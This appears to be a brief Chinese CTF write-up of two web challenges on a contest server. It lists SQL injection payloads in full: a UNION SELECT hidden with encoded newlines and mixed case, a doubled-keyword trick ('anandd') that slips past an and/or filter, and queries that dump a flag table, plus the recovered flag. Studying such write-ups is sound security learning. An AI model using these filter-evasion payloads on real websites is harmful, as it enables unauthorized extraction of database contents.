1.注入得帥照!
地址:http://123.57.240.205:4002/
點擊前往按鈕會直接跳轉到W4nder的博客,爆破可以得到一個hint(hone.php)
hone.php是這樣的一個界面,可以開始注入
payload:id=9122399%27%20%0a%20UNion%20%0a%20SElect%20%0a%201,(SElect%20%0a%20flag%20%0a%20from%20%0a%20flag),2%20%0a%20and%20%0a%20%271%27=%271
得到了一個html頁面,找到了flag(css特別好看)
flag在源碼中被註釋掉了
flag{W4nder_always_god}
2.對方的服務器漏洞口
地址:http://123.57.240.205:4001/check.php
這道題一開始卡了很久,我以爲是有很多過濾,最後發現只有and和or
用anandd繞過就行
找到注入點以後就很好做了,常規操作就行
id=0 union select 1,database(),3,4
payload:id=0 union select 1,group_concat(flag),3,4 from flag